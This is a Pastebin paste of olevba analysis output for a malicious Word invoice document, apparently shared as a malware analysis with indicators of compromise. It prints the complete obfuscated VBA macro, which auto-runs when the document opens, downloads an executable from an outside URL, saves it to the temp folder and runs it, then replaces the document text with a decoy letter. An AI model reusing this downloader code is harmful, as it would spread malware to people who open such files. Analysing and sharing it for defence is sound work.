Advertisement
dynamoo

Malicious Word macro

Dec 15th, 2015
1,004
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoic~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub aliphatic()
  16. Dim elul As String
  17. Dim deforming As Integer
  18. Dim ceratopteris As Variant
  19. guzzler
  20. End Sub
  21.  
  22.  
  23. Sub guzzler()
  24. Dim senora As Object
  25. Dim sacatra As String
  26. Dim algin As String
  27. waterloo = "odds.exe"
  28.  
  29. Set befit = VBA.CreateObject("WS" + Mid("benedictorycript.Shellchargeship", 12, 11))
  30. sacatra = CallByName(befit, "ExpandEnvironmentStrings", VbMethod, "%temp%")
  31. algin = sacatra & "\tmpcanellaceae" & waterloo
  32. Set almighty = adjudge()
  33. carthusian = #11:09:50 AM#
  34. technocracy = Hour(carthusian)
  35.  
  36. normalcy = fancifully(almighty, algin)
  37. manner = #4:53:45 PM#
  38. logogriph = Hour(manner)
  39.  
  40. befit.Run algin
  41. Safeword
  42. End Sub
  43.  
  44.  
  45. Function fancifully(anosmia, mallet)
  46. aoristic = ActiveDocument.BuiltInDocumentProperties("Author")
  47. acharn = Left(aoristic, 2)
  48. bamboo = acharn + "o" + Mid("antipastodb.dermoptera", 10, 3) + Mid("humanisticStreambullhorn", 11, 6)
  49. Set genotypical = CreateObject(bamboo)
  50. erubuit = CallByName(genotypical, "Open", VbMethod)
  51. genotypical.Type = 122 - 121
  52. straggle = CallByName(genotypical, "Write", VbMethod, anosmia.responseBody)
  53. congregationalism = CallByName(genotypical, "Sav" + "eToFi" + "le", VbMethod, mallet, 101 - 100)
  54. End Function
  55.  
  56.  
  57. Sub AutoOpen()
  58. bondslave = #6:53:12 AM#
  59. pyrolusite = Hour(bondslave)
  60. aliphatic
  61. End Sub
  62.  
  63.  
  64.  
  65. Function adjudge()
  66. On Error Resume Next
  67. pert = "Msx" + Mid("ganderml2.Xquaker", 7, 5) + "MLHTTP"
  68. Set adjudge = CreateObject(pert)
  69. dibranchiate = StrReverse("TEG")
  70. adjudge.Open dibranchiate, "http://thewelltakeberlin.com/92.exe", False
  71. picometer = CallByName(adjudge, "send", VbMethod)
  72. GoTo Ex
  73. Ext:
  74. adjudge = 0
  75. Ex:
  76. End Function
  77.  
  78.  
  79. Sub Safeword()
  80.   Word.ActiveDocument.Range.Select
  81.    Selection.WholeStory
  82.      Selection.Delete Unit:=wdCharacter, Count:=(101 - 100)
  83.      Dim shadows As Word.Document
  84.      Set shadows = ThisDocument
  85.      shadows.Range.InsertParagraphAfter
  86.      
  87.      shadows.Range.InsertAfter "Dear Client" + vbLf
  88. shadows.Range.InsertAfter "" + vbLf
  89. shadows.Range.InsertAfter "As of Monday, July 1, 2016, Corporation of America 's Eastern Regional Office will be located in our" + vbLf
  90. shadows.Range.InsertAfter "new offices and warehouse building at 401 Grandiosa Boulevard, Tampa, Florida, 33715. " + vbLf
  91. shadows.Range.InsertAfter "The telephone number or this new location is (813) 555-5428." + vbLf
  92. shadows.Range.InsertAfter "" + vbLf
  93. shadows.Range.InsertAfter "Our Manufacturing Division will remain at 2550 Santa Fe Avenue, in St. Petersburg." + vbLf
  94. shadows.Range.InsertAfter "" + vbLf
  95. shadows.Range.InsertAfter "" + vbLf
  96. shadows.Range.InsertAfter "I have enclosed our most recent brochure on robotic equipment for your review." + vbLf
  97. shadows.Range.InsertAfter "I hope you find it interesting." + vbLf
  98. shadows.Range.InsertAfter "" + vbLf
  99.  
  100. End Sub
  101.  
  102. +------------+----------------------+-----------------------------------------+
  103. | Type       | Keyword              | Description                             |
  104. +------------+----------------------+-----------------------------------------+
  105. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  106. | Suspicious | Open                 | May open a file                         |
  107. | Suspicious | Run                  | May run an executable file or a system  |
  108. |            |                      | command                                 |
  109. | Suspicious | CreateObject         | May create an OLE object                |
  110. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  111. |            |                      | function calls                          |
  112. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  113. |            |                      | strings                                 |
  114. | Suspicious | Write                | May write to a file (if combined with   |
  115. |            |                      | Open)                                   |
  116. | Suspicious | SaveToFile           | May create a text file (obfuscation:    |
  117. |            |                      | VBA expression)                         |
  118. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  119. |            |                      | may be used to obfuscate strings        |
  120. |            |                      | (option --decode to see all)            |
  121. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  122. |            | Strings              | may be used to obfuscate strings        |
  123. |            |                      | (option --decode to see all)            |
  124. | IOC        | http://thewelltakebe | URL                                     |
  125. |            | rlin.com/92.exe      |                                         |
  126. | IOC        | odds.exe             | Executable file name                    |
  127. | IOC        | 92.exe               | Executable file name                    |
  128. | VBA string | SaveToFile           | "Sav" + "eToFi" + "le"                  |
  129. | VBA string | GET                  | StrReverse("TEG")                       |
  130. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement